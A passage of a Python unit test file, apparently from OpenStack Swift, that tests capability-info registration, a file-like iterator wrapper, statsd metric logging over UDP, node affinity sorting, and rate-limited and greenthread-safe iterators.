self.assertTrue('foo' in info['swift'])
self.assertEqual(utils._swift_info['swift']['foo'], 'bar')
self.assertTrue('cap1' in info)
self.assertTrue('cap1_foo' in info['cap1'])
self.assertEqual(utils._swift_info['cap1']['cap1_foo'], 'cap1_bar')
def test_get_swift_info_with_disallowed_sections(self):
utils._swift_info = {'swift': {'foo': 'bar'},
'cap1': {'cap1_foo': 'cap1_bar'},
'cap2': {'cap2_foo': 'cap2_bar'},
'cap3': {'cap3_foo': 'cap3_bar'}}
utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}}
info = utils.get_swift_info(disallowed_sections=['cap1', 'cap3'])
self.assertTrue('admin' not in info)
self.assertTrue('swift' in info)
self.assertTrue('foo' in info['swift'])
self.assertEqual(info['swift']['foo'], 'bar')
self.assertTrue('cap1' not in info)
self.assertTrue('cap2' in info)
self.assertTrue('cap2_foo' in info['cap2'])
self.assertEqual(info['cap2']['cap2_foo'], 'cap2_bar')
self.assertTrue('cap3' not in info)
def test_register_swift_admin_info(self):
utils.register_swift_info(admin=True, admin_foo='admin_bar')
utils.register_swift_info(admin=True, admin_lorem='admin_ipsum')
utils.register_swift_info('cap1', admin=True, ac1_foo='ac1_bar')
utils.register_swift_info('cap1', admin=True, ac1_lorem='ac1_ipsum')
self.assertTrue('swift' in utils._swift_admin_info)
self.assertTrue('admin_foo' in utils._swift_admin_info['swift'])
self.assertEqual(
utils._swift_admin_info['swift']['admin_foo'], 'admin_bar')
self.assertTrue('admin_lorem' in utils._swift_admin_info['swift'])
self.assertEqual(
utils._swift_admin_info['swift']['admin_lorem'], 'admin_ipsum')
self.assertTrue('cap1' in utils._swift_admin_info)
self.assertTrue('ac1_foo' in utils._swift_admin_info['cap1'])
self.assertEqual(
utils._swift_admin_info['cap1']['ac1_foo'], 'ac1_bar')
self.assertTrue('ac1_lorem' in utils._swift_admin_info['cap1'])
self.assertEqual(
utils._swift_admin_info['cap1']['ac1_lorem'], 'ac1_ipsum')
self.assertTrue('swift' not in utils._swift_info)
self.assertTrue('cap1' not in utils._swift_info)
def test_get_swift_admin_info(self):
utils._swift_info = {'swift': {'foo': 'bar'},
'cap1': {'cap1_foo': 'cap1_bar'}}
utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}}
info = utils.get_swift_info(admin=True)
self.assertTrue('admin' in info)
self.assertTrue('admin_cap1' in info['admin'])
self.assertTrue('ac1_foo' in info['admin']['admin_cap1'])
self.assertEqual(info['admin']['admin_cap1']['ac1_foo'], 'ac1_bar')
self.assertTrue('swift' in info)
self.assertTrue('foo' in info['swift'])
self.assertEqual(utils._swift_info['swift']['foo'], 'bar')
self.assertTrue('cap1' in info)
self.assertTrue('cap1_foo' in info['cap1'])
self.assertEqual(utils._swift_info['cap1']['cap1_foo'], 'cap1_bar')
def test_get_swift_admin_info_with_disallowed_sections(self):
utils._swift_info = {'swift': {'foo': 'bar'},
'cap1': {'cap1_foo': 'cap1_bar'},
'cap2': {'cap2_foo': 'cap2_bar'},
'cap3': {'cap3_foo': 'cap3_bar'}}
utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}}
info = utils.get_swift_info(
admin=True, disallowed_sections=['cap1', 'cap3'])
self.assertTrue('admin' in info)
self.assertTrue('admin_cap1' in info['admin'])
self.assertTrue('ac1_foo' in info['admin']['admin_cap1'])
self.assertEqual(info['admin']['admin_cap1']['ac1_foo'], 'ac1_bar')
self.assertTrue('disallowed_sections' in info['admin'])
self.assertTrue('cap1' in info['admin']['disallowed_sections'])
self.assertTrue('cap2' not in info['admin']['disallowed_sections'])
self.assertTrue('cap3' in info['admin']['disallowed_sections'])
self.assertTrue('swift' in info)
self.assertTrue('foo' in info['swift'])
self.assertEqual(info['swift']['foo'], 'bar')
self.assertTrue('cap1' not in info)
self.assertTrue('cap2' in info)
self.assertTrue('cap2_foo' in info['cap2'])
self.assertEqual(info['cap2']['cap2_foo'], 'cap2_bar')
self.assertTrue('cap3' not in info)
def test_get_swift_admin_info_with_disallowed_sub_sections(self):
utils._swift_info = {'swift': {'foo': 'bar'},
'cap1': {'cap1_foo': 'cap1_bar',
'cap1_moo': 'cap1_baa'},
'cap2': {'cap2_foo': 'cap2_bar'},
'cap3': {'cap2_foo': 'cap2_bar'},
'cap4': {'a': {'b': {'c': 'c'},
'b.c': 'b.c'}}}
utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}}
info = utils.get_swift_info(
admin=True, disallowed_sections=['cap1.cap1_foo', 'cap3',
'cap4.a.b.c'])
self.assertTrue('cap3' not in info)
self.assertEqual(info['cap1']['cap1_moo'], 'cap1_baa')
self.assertTrue('cap1_foo' not in info['cap1'])
self.assertTrue('c' not in info['cap4']['a']['b'])
self.assertEqual(info['cap4']['a']['b.c'], 'b.c')
def test_get_swift_info_with_unmatched_disallowed_sections(self):
cap1 = {'cap1_foo': 'cap1_bar',
'cap1_moo': 'cap1_baa'}
utils._swift_info = {'swift': {'foo': 'bar'},
'cap1': cap1}
# expect no exceptions
info = utils.get_swift_info(
disallowed_sections=['cap2.cap1_foo', 'cap1.no_match',
'cap1.cap1_foo.no_match.no_match'])
self.assertEqual(info['cap1'], cap1)
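# FileLikeIter wraps an iterable of byte chunks and exposes file-like
# iteration plus read()/readline()/readlines()/close() on top of it.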
class TestFileLikeIter(unittest.TestCase):
def test_iter_file_iter(self):
in_iter = [b'abc', b'de', b'fghijk', b'l']
chunks = []
for chunk in utils.FileLikeIter(in_iter):
chunks.append(chunk)
self.assertEqual(chunks, in_iter)
def test_next(self):
in_iter = [b'abc', b'de', b'fghijk', b'l']
chunks = []
iter_file = utils.FileLikeIter(in_iter)
while True:
try:
chunk = next(iter_file)
except StopIteration:
break
chunks.append(chunk)
self.assertEqual(chunks, in_iter)
def test_read(self):
in_iter = [b'abc', b'de', b'fghijk', b'l']
iter_file = utils.FileLikeIter(in_iter)
self.assertEqual(iter_file.read(), b''.join(in_iter))
def test_read_with_size(self):
in_iter = [b'abc', b'de', b'fghijk', b'l']
chunks = []
iter_file = utils.FileLikeIter(in_iter)
while True:
chunk = iter_file.read(2)
if not chunk:
break
self.assertTrue(len(chunk) <= 2)
chunks.append(chunk)
self.assertEqual(b''.join(chunks), b''.join(in_iter))
def test_read_with_size_zero(self):
# makes little sense, but file supports it, so...
self.assertEqual(utils.FileLikeIter(b'abc').read(0), b'')
def test_readline(self):
in_iter = [b'abc\n', b'd', b'\nef', b'g\nh', b'\nij\n\nk\n',
b'trailing.']
lines = []
iter_file = utils.FileLikeIter(in_iter)
while True:
line = iter_file.readline()
if not line:
break
lines.append(line)
self.assertEqual(
lines,
[v if v == b'trailing.' else v + b'\n'
for v in b''.join(in_iter).split(b'\n')])
def test_readline2(self):
self.assertEqual(
utils.FileLikeIter([b'abc', b'def\n']).readline(4),
b'abcd')
def test_readline3(self):
self.assertEqual(
utils.FileLikeIter([b'a' * 1111, b'bc\ndef']).readline(),
(b'a' * 1111) + b'bc\n')
def test_readline_with_size(self):
in_iter = [b'abc\n', b'd', b'\nef', b'g\nh', b'\nij\n\nk\n',
b'trailing.']
lines = []
iter_file = utils.FileLikeIter(in_iter)
while True:
line = iter_file.readline(2)
if not line:
break
lines.append(line)
self.assertEqual(
lines,
[b'ab', b'c\n', b'd\n', b'ef', b'g\n', b'h\n', b'ij', b'\n', b'\n',
b'k\n', b'tr', b'ai', b'li', b'ng', b'.'])
def test_readlines(self):
in_iter = [b'abc\n', b'd', b'\nef', b'g\nh', b'\nij\n\nk\n',
b'trailing.']
lines = utils.FileLikeIter(in_iter).readlines()
self.assertEqual(
lines,
[v if v == b'trailing.' else v + b'\n'
for v in b''.join(in_iter).split(b'\n')])
def test_readlines_with_size(self):
in_iter = [b'abc\n', b'd', b'\nef', b'g\nh', b'\nij\n\nk\n',
b'trailing.']
iter_file = utils.FileLikeIter(in_iter)
lists_of_lines = []
while True:
lines = iter_file.readlines(2)
if not lines:
break
lists_of_lines.append(lines)
self.assertEqual(
lists_of_lines,
[[b'ab'], [b'c\n'], [b'd\n'], [b'ef'], [b'g\n'], [b'h\n'], [b'ij'],
[b'\n', b'\n'], [b'k\n'], [b'tr'], [b'ai'], [b'li'], [b'ng'],
[b'.']])
def test_close(self):
iter_file = utils.FileLikeIter([b'a', b'b', b'c'])
self.assertEqual(next(iter_file), b'a')
iter_file.close()
self.assertTrue(iter_file.closed)
self.assertRaises(ValueError, iter_file.next)
self.assertRaises(ValueError, iter_file.read)
self.assertRaises(ValueError, iter_file.readline)
self.assertRaises(ValueError, iter_file.readlines)
# Just make sure repeated close calls don't raise an Exception
iter_file.close()
self.assertTrue(iter_file.closed)
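# get_logger() only attaches a StatsdClient when log_statsd_host is
# configured; the faked getaddrinfo in setUp() keeps client construction from
# doing real DNS lookups.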
class TestStatsdLogging(unittest.TestCase):
def setUp(self):
def fake_getaddrinfo(host, port, *args):
# this is what a real getaddrinfo('localhost', port,
# socket.AF_INET) returned once
return [(socket.AF_INET, # address family
socket.SOCK_STREAM, # socket type
socket.IPPROTO_TCP, # socket protocol
'', # canonical name,
('127.0.0.1', port)), # socket address
(socket.AF_INET,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP,
'',
('127.0.0.1', port))]
self.real_getaddrinfo = utils.socket.getaddrinfo
self.getaddrinfo_patcher = mock.patch.object(
utils.socket, 'getaddrinfo', fake_getaddrinfo)
self.mock_getaddrinfo = self.getaddrinfo_patcher.start()
self.addCleanup(self.getaddrinfo_patcher.stop)
def test_get_logger_statsd_client_not_specified(self):
logger = utils.get_logger({}, 'some-name', log_route='some-route')
# white-box construction validation
self.assertIsNone(logger.logger.statsd_client)
def test_get_logger_statsd_client_defaults(self):
logger = utils.get_logger({'log_statsd_host': 'some.host.com'},
'some-name', log_route='some-route')
# white-box construction validation
self.assertTrue(isinstance(logger.logger.statsd_client,
utils.StatsdClient))
self.assertEqual(logger.logger.statsd_client._host, 'some.host.com')
self.assertEqual(logger.logger.statsd_client._port, 8125)
self.assertEqual(logger.logger.statsd_client._prefix, 'some-name.')
self.assertEqual(logger.logger.statsd_client._default_sample_rate, 1)
logger.set_statsd_prefix('some-name.more-specific')
self.assertEqual(logger.logger.statsd_client._prefix,
'some-name.more-specific.')
logger.set_statsd_prefix('')
self.assertEqual(logger.logger.statsd_client._prefix, '')
def test_get_logger_statsd_client_non_defaults(self):
logger = utils.get_logger({
'log_statsd_host': 'another.host.com',
'log_statsd_port': '9876',
'log_statsd_default_sample_rate': '0.75',
'log_statsd_sample_rate_factor': '0.81',
'log_statsd_metric_prefix': 'tomato.sauce',
}, 'some-name', log_route='some-route')
self.assertEqual(logger.logger.statsd_client._prefix,
'tomato.sauce.some-name.')
logger.set_statsd_prefix('some-name.more-specific')
self.assertEqual(logger.logger.statsd_client._prefix,
'tomato.sauce.some-name.more-specific.')
logger.set_statsd_prefix('')
self.assertEqual(logger.logger.statsd_client._prefix, 'tomato.sauce.')
self.assertEqual(logger.logger.statsd_client._host, 'another.host.com')
self.assertEqual(logger.logger.statsd_client._port, 9876)
self.assertEqual(logger.logger.statsd_client._default_sample_rate,
0.75)
self.assertEqual(logger.logger.statsd_client._sample_rate_factor,
0.81)
def test_ipv4_or_ipv6_hostname_defaults_to_ipv4(self):
def stub_getaddrinfo_both_ipv4_and_ipv6(host, port, family, *rest):
if family == socket.AF_INET:
return [(socket.AF_INET, 'blah', 'blah', 'blah',
('127.0.0.1', int(port)))]
elif family == socket.AF_INET6:
# Implemented so an incorrectly ordered implementation (IPv6
# then IPv4) would realistically fail.
return [(socket.AF_INET6, 'blah', 'blah', 'blah',
('::1', int(port), 0, 0))]
with mock.patch.object(utils.socket, 'getaddrinfo',
new=stub_getaddrinfo_both_ipv4_and_ipv6):
logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': '9876',
}, 'some-name', log_route='some-route')
statsd_client = logger.logger.statsd_client
self.assertEqual(statsd_client._sock_family, socket.AF_INET)
self.assertEqual(statsd_client._target, ('localhost', 9876))
got_sock = statsd_client._open_socket()
self.assertEqual(got_sock.family, socket.AF_INET)
def test_ipv4_instantiation_and_socket_creation(self):
logger = utils.get_logger({
'log_statsd_host': '127.0.0.1',
'log_statsd_port': '9876',
}, 'some-name', log_route='some-route')
statsd_client = logger.logger.statsd_client
self.assertEqual(statsd_client._sock_family, socket.AF_INET)
self.assertEqual(statsd_client._target, ('127.0.0.1', 9876))
got_sock = statsd_client._open_socket()
self.assertEqual(got_sock.family, socket.AF_INET)
def test_ipv6_instantiation_and_socket_creation(self):
# We have to check the given hostname or IP for IPv4/IPv6 on logger
# instantiation so we don't call getaddrinfo() too often and don't have
# to call bind() on our socket to detect IPv4/IPv6 on every send.
#
# This test uses the real getaddrinfo, so we patch over the mock to
# put the real one back. If we just stop the mock, then
# unittest.exit() blows up, but stacking real-fake-real works okay.
with mock.patch.object(utils.socket, 'getaddrinfo',
self.real_getaddrinfo):
logger = utils.get_logger({
'log_statsd_host': '::1',
'log_statsd_port': '9876',
}, 'some-name', log_route='some-route')
statsd_client = logger.logger.statsd_client
self.assertEqual(statsd_client._sock_family, socket.AF_INET6)
self.assertEqual(statsd_client._target, ('::1', 9876, 0, 0))
got_sock = statsd_client._open_socket()
self.assertEqual(got_sock.family, socket.AF_INET6)
def test_bad_hostname_instantiation(self):
with mock.patch.object(utils.socket, 'getaddrinfo',
side_effect=utils.socket.gaierror("whoops")):
logger = utils.get_logger({
'log_statsd_host': 'i-am-not-a-hostname-or-ip',
'log_statsd_port': '9876',
}, 'some-name', log_route='some-route')
statsd_client = logger.logger.statsd_client
self.assertEqual(statsd_client._sock_family, socket.AF_INET)
self.assertEqual(statsd_client._target,
('i-am-not-a-hostname-or-ip', 9876))
got_sock = statsd_client._open_socket()
self.assertEqual(got_sock.family, socket.AF_INET)
# Maybe the DNS server gets fixed in a bit and it starts working... or
# maybe the DNS record hadn't propagated yet. In any case, failed
# statsd sends will warn in the logs until the DNS failure or invalid
# IP address in the configuration is fixed.
def test_sending_ipv6(self):
def fake_getaddrinfo(host, port, *args):
# this is what a real getaddrinfo('::1', port,
# socket.AF_INET6) returned once
return [(socket.AF_INET6,
socket.SOCK_STREAM,
socket.IPPROTO_TCP,
'', ('::1', port, 0, 0)),
(socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP,
'',
('::1', port, 0, 0))]
with mock.patch.object(utils.socket, 'getaddrinfo', fake_getaddrinfo):
logger = utils.get_logger({
'log_statsd_host': '::1',
'log_statsd_port': '9876',
}, 'some-name', log_route='some-route')
statsd_client = logger.logger.statsd_client
fl = FakeLogger()
statsd_client.logger = fl
mock_socket = MockUdpSocket()
statsd_client._open_socket = lambda *_: mock_socket
logger.increment('tunafish')
self.assertEqual(fl.get_lines_for_level('warning'), [])
self.assertEqual(mock_socket.sent,
[(b'some-name.tunafish:1|c', ('::1', 9876, 0, 0))])
def test_no_exception_when_cant_send_udp_packet(self):
logger = utils.get_logger({'log_statsd_host': 'some.host.com'})
statsd_client = logger.logger.statsd_client
fl = FakeLogger()
statsd_client.logger = fl
mock_socket = MockUdpSocket(sendto_errno=errno.EPERM)
statsd_client._open_socket = lambda *_: mock_socket
logger.increment('tunafish')
expected = ["Error sending UDP message to ('some.host.com', 8125): "
"[Errno 1] test errno 1"]
self.assertEqual(fl.get_lines_for_level('warning'), expected)
def test_sample_rates(self):
logger = utils.get_logger({'log_statsd_host': 'some.host.com'})
mock_socket = MockUdpSocket()
# encapsulation? what's that?
statsd_client = logger.logger.statsd_client
self.assertTrue(statsd_client.random is random.random)
statsd_client._open_socket = lambda *_: mock_socket
statsd_client.random = lambda: 0.50001
logger.increment('tribbles', sample_rate=0.5)
self.assertEqual(len(mock_socket.sent), 0)
statsd_client.random = lambda: 0.49999
logger.increment('tribbles', sample_rate=0.5)
self.assertEqual(len(mock_socket.sent), 1)
payload = mock_socket.sent[0][0]
self.assertTrue(payload.endswith(b"|@0.5"))
def test_sample_rates_with_sample_rate_factor(self):
logger = utils.get_logger({
'log_statsd_host': 'some.host.com',
'log_statsd_default_sample_rate': '0.82',
'log_statsd_sample_rate_factor': '0.91',
})
effective_sample_rate = 0.82 * 0.91
mock_socket = MockUdpSocket()
# encapsulation? what's that?
statsd_client = logger.logger.statsd_client
self.assertTrue(statsd_client.random is random.random)
statsd_client._open_socket = lambda *_: mock_socket
statsd_client.random = lambda: effective_sample_rate + 0.001
logger.increment('tribbles')
self.assertEqual(len(mock_socket.sent), 0)
statsd_client.random = lambda: effective_sample_rate - 0.001
logger.increment('tribbles')
self.assertEqual(len(mock_socket.sent), 1)
payload = mock_socket.sent[0][0]
suffix = "|@%s" % effective_sample_rate
if six.PY3:
suffix = suffix.encode('utf-8')
self.assertTrue(payload.endswith(suffix), payload)
effective_sample_rate = 0.587 * 0.91
statsd_client.random = lambda: effective_sample_rate - 0.001
logger.increment('tribbles', sample_rate=0.587)
self.assertEqual(len(mock_socket.sent), 2)
payload = mock_socket.sent[1][0]
suffix = "|@%s" % effective_sample_rate
if six.PY3:
suffix = suffix.encode('utf-8')
self.assertTrue(payload.endswith(suffix), payload)
def test_timing_stats(self):
class MockController(object):
def __init__(self, status):
self.status = status
self.logger = self
self.args = ()
self.called = 'UNKNOWN'
def timing_since(self, *args):
self.called = 'timing'
self.args = args
@utils.timing_stats()
def METHOD(controller):
return Response(status=controller.status)
mock_controller = MockController(200)
METHOD(mock_controller)
self.assertEqual(mock_controller.called, 'timing')
self.assertEqual(len(mock_controller.args), 2)
self.assertEqual(mock_controller.args[0], 'METHOD.timing')
self.assertTrue(mock_controller.args[1] > 0)
mock_controller = MockController(404)
METHOD(mock_controller)
self.assertEqual(len(mock_controller.args), 2)
self.assertEqual(mock_controller.called, 'timing')
self.assertEqual(mock_controller.args[0], 'METHOD.timing')
self.assertTrue(mock_controller.args[1] > 0)
mock_controller = MockController(412)
METHOD(mock_controller)
self.assertEqual(len(mock_controller.args), 2)
self.assertEqual(mock_controller.called, 'timing')
self.assertEqual(mock_controller.args[0], 'METHOD.timing')
self.assertTrue(mock_controller.args[1] > 0)
mock_controller = MockController(416)
METHOD(mock_controller)
self.assertEqual(len(mock_controller.args), 2)
self.assertEqual(mock_controller.called, 'timing')
self.assertEqual(mock_controller.args[0], 'METHOD.timing')
self.assertTrue(mock_controller.args[1] > 0)
mock_controller = MockController(401)
METHOD(mock_controller)
self.assertEqual(len(mock_controller.args), 2)
self.assertEqual(mock_controller.called, 'timing')
self.assertEqual(mock_controller.args[0], 'METHOD.errors.timing')
self.assertTrue(mock_controller.args[1] > 0)
class UnsafeXrange(object):
"""
Like xrange(limit), but with extra context switching to screw things up.
"""
def __init__(self, upper_bound):
self.current = 0
self.concurrent_calls = 0
self.upper_bound = upper_bound
self.concurrent_call = False
def __iter__(self):
return self
def next(self):
if self.concurrent_calls > 0:
self.concurrent_call = True
self.concurrent_calls += 1
try:
if self.current >= self.upper_bound:
raise StopIteration
else:
val = self.current
self.current += 1
eventlet.sleep() # yield control
return val
finally:
self.concurrent_calls -= 1
__next__ = next
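# affinity_key_function() turns a spec like "r1=100, r2z2=50" into a sort key
# that ranks matching nodes by their configured priority (lower sorts first)
# while leaving unmatched nodes in their original relative order.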
class TestAffinityKeyFunction(unittest.TestCase):
def setUp(self):
self.nodes = [dict(id=0, region=1, zone=1),
dict(id=1, region=1, zone=2),
dict(id=2, region=2, zone=1),
dict(id=3, region=2, zone=2),
dict(id=4, region=3, zone=1),
dict(id=5, region=3, zone=2),
dict(id=6, region=4, zone=0),
dict(id=7, region=4, zone=1)]
def test_single_region(self):
keyfn = utils.affinity_key_function("r3=1")
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([4, 5, 0, 1, 2, 3, 6, 7], ids)
def test_bogus_value(self):
self.assertRaises(ValueError,
utils.affinity_key_function, "r3")
self.assertRaises(ValueError,
utils.affinity_key_function, "r3=elephant")
def test_empty_value(self):
# Empty's okay, it just means no preference
keyfn = utils.affinity_key_function("")
self.assertTrue(callable(keyfn))
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([0, 1, 2, 3, 4, 5, 6, 7], ids)
def test_all_whitespace_value(self):
# Empty's okay, it just means no preference
keyfn = utils.affinity_key_function(" \n")
self.assertTrue(callable(keyfn))
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([0, 1, 2, 3, 4, 5, 6, 7], ids)
def test_with_zone_zero(self):
keyfn = utils.affinity_key_function("r4z0=1")
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([6, 0, 1, 2, 3, 4, 5, 7], ids)
def test_multiple(self):
keyfn = utils.affinity_key_function("r1=100, r4=200, r3z1=1")
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([4, 0, 1, 6, 7, 2, 3, 5], ids)
def test_more_specific_after_less_specific(self):
keyfn = utils.affinity_key_function("r2=100, r2z2=50")
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([3, 2, 0, 1, 4, 5, 6, 7], ids)
class TestAffinityLocalityPredicate(unittest.TestCase):
def setUp(self):
self.nodes = [dict(id=0, region=1, zone=1),
dict(id=1, region=1, zone=2),
dict(id=2, region=2, zone=1),
dict(id=3, region=2, zone=2),
dict(id=4, region=3, zone=1),
dict(id=5, region=3, zone=2),
dict(id=6, region=4, zone=0),
dict(id=7, region=4, zone=1)]
def test_empty(self):
pred = utils.affinity_locality_predicate('')
self.assertTrue(pred is None)
def test_region(self):
pred = utils.affinity_locality_predicate('r1')
self.assertTrue(callable(pred))
ids = [n['id'] for n in self.nodes if pred(n)]
self.assertEqual([0, 1], ids)
def test_zone(self):
pred = utils.affinity_locality_predicate('r1z1')
self.assertTrue(callable(pred))
ids = [n['id'] for n in self.nodes if pred(n)]
self.assertEqual([0], ids)
def test_multiple(self):
pred = utils.affinity_locality_predicate('r1, r3, r4z0')
self.assertTrue(callable(pred))
ids = [n['id'] for n in self.nodes if pred(n)]
self.assertEqual([0, 1, 4, 5, 6], ids)
def test_invalid(self):
self.assertRaises(ValueError,
utils.affinity_locality_predicate, 'falafel')
self.assertRaises(ValueError,
utils.affinity_locality_predicate, 'r8zQ')
self.assertRaises(ValueError,
utils.affinity_locality_predicate, 'r2d2')
self.assertRaises(ValueError,
utils.affinity_locality_predicate, 'r1z1=1')
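# RateLimitedIterator throttles iteration to the requested per-second rate
# (100 in these tests); run_under_pseudo_time() patches time.time and
# eventlet.sleep so the counts asserted below are deterministic rather than
# wall-clock dependent.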
class TestRateLimitedIterator(unittest.TestCase):
def run_under_pseudo_time(
self, func, *args, **kwargs):
curr_time = [42.0]
def my_time():
curr_time[0] += 0.001
return curr_time[0]
def my_sleep(duration):
curr_time[0] += 0.001
curr_time[0] += duration
with patch('time.time', my_time), \
patch('eventlet.sleep', my_sleep):
return func(*args, **kwargs)
def test_rate_limiting(self):
def testfunc():
limited_iterator = utils.RateLimitedIterator(range(9999), 100)
got = []
started_at = time.time()
try:
while time.time() - started_at < 0.1:
got.append(next(limited_iterator))
except StopIteration:
pass
return got
got = self.run_under_pseudo_time(testfunc)
# it's 11, not 10, because ratelimiting doesn't apply to the very
# first element.
self.assertEqual(len(got), 11)
def test_rate_limiting_sometimes(self):
def testfunc():
limited_iterator = utils.RateLimitedIterator(
range(9999), 100,
ratelimit_if=lambda item: item % 23 != 0)
got = []
started_at = time.time()
try:
while time.time() - started_at < 0.5:
got.append(next(limited_iterator))
except StopIteration:
pass
return got
got = self.run_under_pseudo_time(testfunc)
# we'd get 51 without the ratelimit_if, but because 0, 23 and 46
# weren't subject to ratelimiting, we get 54 instead
self.assertEqual(len(got), 54)
def test_limit_after(self):
def testfunc():
limited_iterator = utils.RateLimitedIterator(
range(9999), 100, limit_after=5)
got = []
started_at = time.time()
try:
while time.time() - started_at < 0.1:
got.append(next(limited_iterator))
except StopIteration:
pass
return got
got = self.run_under_pseudo_time(testfunc)
# it's 16, not 15, because ratelimiting doesn't apply to the very
# first element.
self.assertEqual(len(got), 16)
class TestGreenthreadSafeIterator(unittest.TestCase):
def increment(self, iterable):
plus_ones = []
for n in iterable:
plus_ones.append(n + 1)
return plus_ones
def test_setup_works(self):
# it should work without concurrent access
self.assertEqual([0, 1, 2, 3], list(UnsafeXrange(4)))
iterable = UnsafeXrange(10)
pile = eventlet.GreenPile(2)
for _ in range(2):
pile.spawn(self.increment, iterable)
sorted([resp for resp in pile])
self.assertTrue(
iterable.concurrent_call, 'test setup is insufficiently crazy')
def test_access_is_serialized(self):
pile = eventlet.GreenPile(2)
unsafe_iterable = UnsafeXrange(10)
iterable = utils.GreenthreadSafeIterator(unsafe_iterable)
for _ in range(2):
pile.spawn(self.increment, iterable)
response = sorted(sum([resp for resp in pile], []))
self.assertEqual(list(range(1, 11)), response)
self.assertTrue(
not unsafe_iterable.concurrent_call, 'concurrent call occurred')
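# The delegation tests below do a real UDP round trip: a reader thread drains
# a local socket into a queue, and the assertStat helpers compare what the
# StatsdClient actually put on the wire against the expected statsd payloads.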
class TestStatsdLoggingDelegation(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.sock.bind(('localhost', 0))
self.port = self.sock.getsockname()[1]
self.queue = Queue()
self.reader_thread = threading.Thread(target=self.statsd_reader)
self.reader_thread.setDaemon(1)
self.reader_thread.start()
def tearDown(self):
# The "no-op when disabled" test doesn't set up a real logger, so
# create one here so we can tell the reader thread to stop.
if not getattr(self, 'logger', None):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
}, 'some-name')
self.logger.increment('STOP')
self.reader_thread.join(timeout=4)
self.sock.close()
del self.logger
def statsd_reader(self):
while True:
try:
payload = self.sock.recv(4096)
if payload and b'STOP' in payload:
return 42
self.queue.put(payload)
except Exception as e:
sys.stderr.write('statsd_reader thread: %r' % (e,))
break
def _send_and_get(self, sender_fn, *args, **kwargs):
"""
Because the client library may not actually send a packet with
sample_rate < 1, we keep trying until we get one through.
"""
got = None
while not got:
sender_fn(*args, **kwargs)
try:
got = self.queue.get(timeout=0.5)
except Empty:
pass
return got
def assertStat(self, expected, sender_fn, *args, **kwargs):
got = self._send_and_get(sender_fn, *args, **kwargs)
if six.PY3:
got = got.decode('utf-8')
return self.assertEqual(expected, got)
def assertStatMatches(self, expected_regexp, sender_fn, *args, **kwargs):
got = self._send_and_get(sender_fn, *args, **kwargs)
if six.PY3:
got = got.decode('utf-8')
return self.assertTrue(re.search(expected_regexp, got),
[got, expected_regexp])
def test_methods_are_no_ops_when_not_enabled(self):
logger = utils.get_logger({
# No "log_statsd_host" means "disabled"
'log_statsd_port': str(self.port),
}, 'some-name')
# Delegate methods are no-ops
self.assertIsNone(logger.update_stats('foo', 88))
self.assertIsNone(logger.update_stats('foo', 88, 0.57))
self.assertIsNone(logger.update_stats('foo', 88,
sample_rate=0.61))
self.assertIsNone(logger.increment('foo'))
self.assertIsNone(logger.increment('foo', 0.57))
self.assertIsNone(logger.increment('foo', sample_rate=0.61))
self.assertIsNone(logger.decrement('foo'))
self.assertIsNone(logger.decrement('foo', 0.57))
self.assertIsNone(logger.decrement('foo', sample_rate=0.61))
self.assertIsNone(logger.timing('foo', 88.048))
self.assertIsNone(logger.timing('foo', 88.57, 0.34))
self.assertIsNone(logger.timing('foo', 88.998, sample_rate=0.82))
self.assertIsNone(logger.timing_since('foo', 8938))
self.assertIsNone(logger.timing_since('foo', 8948, 0.57))
self.assertIsNone(logger.timing_since('foo', 849398,
sample_rate=0.61))
# Now, the queue should be empty (no UDP packets sent)
self.assertRaises(Empty, self.queue.get_nowait)
def test_delegate_methods_with_no_default_sample_rate(self):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
}, 'some-name')
self.assertStat('some-name.some.counter:1|c', self.logger.increment,
'some.counter')
self.assertStat('some-name.some.counter:-1|c', self.logger.decrement,
'some.counter')
self.assertStat('some-name.some.operation:4900.0|ms',
self.logger.timing, 'some.operation', 4.9 * 1000)
self.assertStatMatches('some-name\.another\.operation:\d+\.\d+\|ms',
self.logger.timing_since, 'another.operation',
time.time())
self.assertStat('some-name.another.counter:42|c',
self.logger.update_stats, 'another.counter', 42)
# Each call can override the sample_rate (also, bonus prefix test)
self.logger.set_statsd_prefix('pfx')
self.assertStat('pfx.some.counter:1|c|@0.972', self.logger.increment,
'some.counter', sample_rate=0.972)
self.assertStat('pfx.some.counter:-1|c|@0.972', self.logger.decrement,
'some.counter', sample_rate=0.972)
self.assertStat('pfx.some.operation:4900.0|ms|@0.972',
self.logger.timing, 'some.operation', 4.9 * 1000,
sample_rate=0.972)
self.assertStatMatches('pfx\.another\.op:\d+\.\d+\|ms|@0.972',
self.logger.timing_since, 'another.op',
time.time(), sample_rate=0.972)
self.assertStat('pfx.another.counter:3|c|@0.972',
self.logger.update_stats, 'another.counter', 3,
sample_rate=0.972)
# Can override sample_rate with non-keyword arg
self.logger.set_statsd_prefix('')
self.assertStat('some.counter:1|c|@0.939', self.logger.increment,
'some.counter', 0.939)
self.assertStat('some.counter:-1|c|@0.939', self.logger.decrement,
'some.counter', 0.939)
self.assertStat('some.operation:4900.0|ms|@0.939',
self.logger.timing, 'some.operation',
4.9 * 1000, 0.939)
self.assertStatMatches('another\.op:\d+\.\d+\|ms|@0.939',
self.logger.timing_since, 'another.op',
time.time(), 0.939)
self.assertStat('another.counter:3|c|@0.939',
self.logger.update_stats, 'another.counter', 3, 0.939)
def test_delegate_methods_with_default_sample_rate(self):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
'log_statsd_default_sample_rate': '0.93',
